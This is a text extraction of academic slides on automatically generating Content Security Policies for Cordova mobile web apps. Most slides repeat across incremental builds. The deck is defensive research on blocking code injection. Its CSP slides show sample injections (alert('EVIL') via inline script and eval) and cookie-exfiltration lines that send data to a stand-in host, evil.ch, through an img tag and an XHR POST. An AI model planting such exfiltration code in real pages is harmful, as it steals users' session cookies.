Trust propagation can allow them:”script-src ’sha256-[parent-hash]’ ’strict-dynamic’;”This is the biggest security win provided by CSPUnfortunately, ’unsafe-inline’ is very common
91% of Cordova apps studied by one paper87% of web apps analyzed by large-scale study
13 / 51
![Page 42: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/42.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the mostimportant way of injecting code
<script>alert(’EVIL’)</script>Such scripts are blocked by default”script-src unsafe-inline” can allow themUsing hashes or nonces can allow them:”script-src ’sha256-[hash]’;”Trust propagation can allow them:”script-src ’sha256-[parent-hash]’ ’strict-dynamic’;”
This is the biggest security win provided by CSPUnfortunately, ’unsafe-inline’ is very common
91% of Cordova apps studied by one paper87% of web apps analyzed by large-scale study
13 / 51
![Page 43: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/43.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the mostimportant way of injecting code
<script>alert(’EVIL’)</script>Such scripts are blocked by default”script-src unsafe-inline” can allow themUsing hashes or nonces can allow them:”script-src ’sha256-[hash]’;”Trust propagation can allow them:”script-src ’sha256-[parent-hash]’ ’strict-dynamic’;”This is the biggest security win provided by CSP
Unfortunately, ’unsafe-inline’ is very common
91% of Cordova apps studied by one paper87% of web apps analyzed by large-scale study
13 / 51
![Page 44: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/44.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the mostimportant way of injecting code
<script>alert(’EVIL’)</script>Such scripts are blocked by default”script-src unsafe-inline” can allow themUsing hashes or nonces can allow them:”script-src ’sha256-[hash]’;”Trust propagation can allow them:”script-src ’sha256-[parent-hash]’ ’strict-dynamic’;”This is the biggest security win provided by CSPUnfortunately, ’unsafe-inline’ is very common
91% of Cordova apps studied by one paper87% of web apps analyzed by large-scale study
13 / 51
![Page 45: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/45.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
Adding inline scripts to the DOM is arguably the mostimportant way of injecting code
<script>alert(’EVIL’)</script>Such scripts are blocked by default”script-src unsafe-inline” can allow themUsing hashes or nonces can allow them:”script-src ’sha256-[hash]’;”Trust propagation can allow them:”script-src ’sha256-[parent-hash]’ ’strict-dynamic’;”This is the biggest security win provided by CSPUnfortunately, ’unsafe-inline’ is very common
91% of Cordova apps studied by one paper87% of web apps analyzed by large-scale study
13 / 51
![Page 46: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/46.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
String evaluation is another common injection sink
eval(”alert(’EVIL’)”)Such expressions are blocked by default”script-src unsafe-eval” can allow themUnfortunately, ’unsafe-eval’ is also very common
92% of Cordova apps studied by one paper82% of web apps analyzed by large-scale study
One reason for this is that frameworks like jQuery heavily relyon string evaluation
14 / 51
![Page 47: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/47.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
String evaluation is another common injection sink
eval(”alert(’EVIL’)”)
Such expressions are blocked by default”script-src unsafe-eval” can allow themUnfortunately, ’unsafe-eval’ is also very common
92% of Cordova apps studied by one paper82% of web apps analyzed by large-scale study
One reason for this is that frameworks like jQuery heavily relyon string evaluation
14 / 51
![Page 48: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/48.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
String evaluation is another common injection sink
eval(”alert(’EVIL’)”)Such expressions are blocked by default
”script-src unsafe-eval” can allow themUnfortunately, ’unsafe-eval’ is also very common
92% of Cordova apps studied by one paper82% of web apps analyzed by large-scale study
One reason for this is that frameworks like jQuery heavily relyon string evaluation
14 / 51
![Page 49: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/49.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
String evaluation is another common injection sink
eval(”alert(’EVIL’)”)Such expressions are blocked by default”script-src unsafe-eval” can allow them
Unfortunately, ’unsafe-eval’ is also very common
92% of Cordova apps studied by one paper82% of web apps analyzed by large-scale study
One reason for this is that frameworks like jQuery heavily relyon string evaluation
14 / 51
![Page 50: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/50.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
String evaluation is another common injection sink
eval(”alert(’EVIL’)”)Such expressions are blocked by default”script-src unsafe-eval” can allow themUnfortunately, ’unsafe-eval’ is also very common
92% of Cordova apps studied by one paper82% of web apps analyzed by large-scale study
One reason for this is that frameworks like jQuery heavily relyon string evaluation
14 / 51
![Page 51: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/51.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
String evaluation is another common injection sink
eval(”alert(’EVIL’)”)Such expressions are blocked by default”script-src unsafe-eval” can allow themUnfortunately, ’unsafe-eval’ is also very common
92% of Cordova apps studied by one paper82% of web apps analyzed by large-scale study
One reason for this is that frameworks like jQuery heavily relyon string evaluation
14 / 51
![Page 52: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/52.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
String evaluation is another common injection sink
eval(”alert(’EVIL’)”)Such expressions are blocked by default”script-src unsafe-eval” can allow themUnfortunately, ’unsafe-eval’ is also very common
92% of Cordova apps studied by one paper82% of web apps analyzed by large-scale study
One reason for this is that frameworks like jQuery heavily relyon string evaluation
14 / 51
![Page 53: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/53.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
CSP also mitigates the exfiltration of data
<img src=”https://evil.ch/[cookie]”>xhr.open(’POST’, ’https://evil.ch’); xhr.send(cookie);Such exfiltrations are blocked by default if an img-src /connect-src rule is present”img-src evil.ch” / ”connect-src evil.ch” can allow themUnfortunately, whitelisting the general wildcard (*) is verycommon
77% of Cordova apps studied by one paper whitelist * indefault-src
15 / 51
![Page 54: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/54.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
CSP also mitigates the exfiltration of data
<img src=”https://evil.ch/[cookie]”>xhr.open(’POST’, ’https://evil.ch’); xhr.send(cookie);
Such exfiltrations are blocked by default if an img-src /connect-src rule is present”img-src evil.ch” / ”connect-src evil.ch” can allow themUnfortunately, whitelisting the general wildcard (*) is verycommon
77% of Cordova apps studied by one paper whitelist * indefault-src
15 / 51
![Page 55: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/55.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
CSP also mitigates the exfiltration of data
<img src=”https://evil.ch/[cookie]”>xhr.open(’POST’, ’https://evil.ch’); xhr.send(cookie);Such exfiltrations are blocked by default if an img-src /connect-src rule is present
”img-src evil.ch” / ”connect-src evil.ch” can allow themUnfortunately, whitelisting the general wildcard (*) is verycommon
77% of Cordova apps studied by one paper whitelist * indefault-src
15 / 51
![Page 56: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/56.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
CSP also mitigates the exfiltration of data
<img src=”https://evil.ch/[cookie]”>xhr.open(’POST’, ’https://evil.ch’); xhr.send(cookie);Such exfiltrations are blocked by default if an img-src /connect-src rule is present”img-src evil.ch” / ”connect-src evil.ch” can allow them
Unfortunately, whitelisting the general wildcard (*) is verycommon
77% of Cordova apps studied by one paper whitelist * indefault-src
15 / 51
![Page 57: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/57.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
CSP also mitigates the exfiltration of data
<img src=”https://evil.ch/[cookie]”>xhr.open(’POST’, ’https://evil.ch’); xhr.send(cookie);Such exfiltrations are blocked by default if an img-src /connect-src rule is present”img-src evil.ch” / ”connect-src evil.ch” can allow themUnfortunately, whitelisting the general wildcard (*) is verycommon
77% of Cordova apps studied by one paper whitelist * indefault-src
15 / 51
![Page 58: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/58.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
How does CSP prevent/mitigate attacks?
CSP also mitigates the exfiltration of data
<img src=”https://evil.ch/[cookie]”>xhr.open(’POST’, ’https://evil.ch’); xhr.send(cookie);Such exfiltrations are blocked by default if an img-src /connect-src rule is present”img-src evil.ch” / ”connect-src evil.ch” can allow themUnfortunately, whitelisting the general wildcard (*) is verycommon
77% of Cordova apps studied by one paper whitelist * indefault-src
15 / 51
![Page 59: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/59.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Table of Contents
1 Mobile Web Apps
2 Code Injection
3 Content Security Policy
4 Research Questions
5 Automatically Applying CSP
6 Results
16 / 51
![Page 60: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/60.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
17 / 51
![Page 61: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/61.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
17 / 51
![Page 62: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/62.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
17 / 51
![Page 63: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/63.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
17 / 51
![Page 64: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/64.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
17 / 51
![Page 65: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/65.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
17 / 51
![Page 66: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/66.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?
2 How prevalent are the patterns we cannot rewrite?
17 / 51
![Page 67: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/67.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Research questions
1 What attack methods against mobile web applications exist?
2 How can CSP prevent or mitigate such attacks?
3 Can we automatically generate sensible CSP definitions forreal-world Cordova apps?
1 Can we rewrite real-world Cordova apps to allow more strictCSP definitions?
2 What patterns limit us in rewriting applications and generatingCSP definitions?
4 How prevalent are the patterns we attempt to rewrite?
1 How prevalent are the patterns we can successfully rewrite?2 How prevalent are the patterns we cannot rewrite?
17 / 51
![Page 68: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/68.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Table of Contents
1 Mobile Web Apps
2 Code Injection
3 Content Security Policy
4 Research Questions
5 Automatically Applying CSP
6 Results
18 / 51
![Page 69: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/69.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The problem
The problem
Many applications don’t use any CSP at allOf those that do, many apps use it in a way that doesn’tleverage its main advantagesMany applications make use of APIs that are incompatiblewith strict CSP rules
A solution?
Automatic generation of CSP rules would make it easy todeploy CSP for existing appsIncompatible APIs should be rewritten in order to avoid losingstrictnessCare must be taken to avoid breaking app functionalities
19 / 51
![Page 70: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/70.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The problem
The problem
Many applications don’t use any CSP at all
Of those that do, many apps use it in a way that doesn’tleverage its main advantagesMany applications make use of APIs that are incompatiblewith strict CSP rules
A solution?
Automatic generation of CSP rules would make it easy todeploy CSP for existing appsIncompatible APIs should be rewritten in order to avoid losingstrictnessCare must be taken to avoid breaking app functionalities
19 / 51
![Page 71: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/71.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The problem
The problem
Many applications don’t use any CSP at allOf those that do, many apps use it in a way that doesn’tleverage its main advantages
Many applications make use of APIs that are incompatiblewith strict CSP rules
A solution?
Automatic generation of CSP rules would make it easy todeploy CSP for existing appsIncompatible APIs should be rewritten in order to avoid losingstrictnessCare must be taken to avoid breaking app functionalities
19 / 51
![Page 72: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/72.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The problem
The problem
Many applications don’t use any CSP at allOf those that do, many apps use it in a way that doesn’tleverage its main advantagesMany applications make use of APIs that are incompatiblewith strict CSP rules
A solution?
Automatic generation of CSP rules would make it easy todeploy CSP for existing appsIncompatible APIs should be rewritten in order to avoid losingstrictnessCare must be taken to avoid breaking app functionalities
19 / 51
![Page 73: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/73.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The problem
The problem
Many applications don’t use any CSP at allOf those that do, many apps use it in a way that doesn’tleverage its main advantagesMany applications make use of APIs that are incompatiblewith strict CSP rules
A solution?
Automatic generation of CSP rules would make it easy todeploy CSP for existing appsIncompatible APIs should be rewritten in order to avoid losingstrictnessCare must be taken to avoid breaking app functionalities
19 / 51
![Page 74: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/74.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The problem
The problem
Many applications don’t use any CSP at allOf those that do, many apps use it in a way that doesn’tleverage its main advantagesMany applications make use of APIs that are incompatiblewith strict CSP rules
A solution?
Automatic generation of CSP rules would make it easy todeploy CSP for existing apps
Incompatible APIs should be rewritten in order to avoid losingstrictnessCare must be taken to avoid breaking app functionalities
19 / 51
![Page 75: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/75.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The problem
The problem
Many applications don’t use any CSP at allOf those that do, many apps use it in a way that doesn’tleverage its main advantagesMany applications make use of APIs that are incompatiblewith strict CSP rules
A solution?
Automatic generation of CSP rules would make it easy todeploy CSP for existing appsIncompatible APIs should be rewritten in order to avoid losingstrictness
Care must be taken to avoid breaking app functionalities
19 / 51
![Page 76: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/76.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The problem
The problem
Many applications don’t use any CSP at allOf those that do, many apps use it in a way that doesn’tleverage its main advantagesMany applications make use of APIs that are incompatiblewith strict CSP rules
A solution?
Automatic generation of CSP rules would make it easy todeploy CSP for existing appsIncompatible APIs should be rewritten in order to avoid losingstrictnessCare must be taken to avoid breaking app functionalities
19 / 51
![Page 77: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/77.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The pipeline
Iterate over
HTML filesProcess related JS
Write changes
to JS snippets
Extract sources
from HTML
Extract sources
from HTML and JS
Rewrite CSS and extract
related sources
Rewrite scripts and
extract related sources
Write changes
to HTML files
Write CSP definition to
HTML file
Find all
HTML files
Set constant CSP
directives
20 / 51
![Page 78: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/78.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The pipeline
21 / 51
![Page 79: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/79.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The pipeline
22 / 51
![Page 80: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/80.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Setting constant CSP directives
”default-src ’self’; upgrade-insecure-requests;”
23 / 51
![Page 81: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/81.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The pipeline
24 / 51
![Page 82: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/82.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
Extracting sources from HTML
manifest-src:<link rel=”manifest” href=”https://example.ch”>
base-uri:<base href=”https://example.ch/”>
plugin-types:<object data=”https://example.ch/flash”type=”application/x-shockwave-flash”>
form-action:<form action=”javascript:alert(’FORM’)” method=”post”>
25 / 51
![Page 83: Autogenerating Content Security Policies to Prevent Code …scg.unibe.ch/.../2020-01-28-Schoeni-AutogeneratingCSP.pdf · 2020-01-30 · Mobile Web Apps Code Injection Content Security](https://reader034.vdocument.in/reader034/viewer/2022042402/5f13a7608f515d1a740754eb/html5/thumbnails/83.jpg)
Mobile Web Apps Code Injection Content Security Policy Research Questions Automatically Applying CSP Results
The pipeline
26 / 51
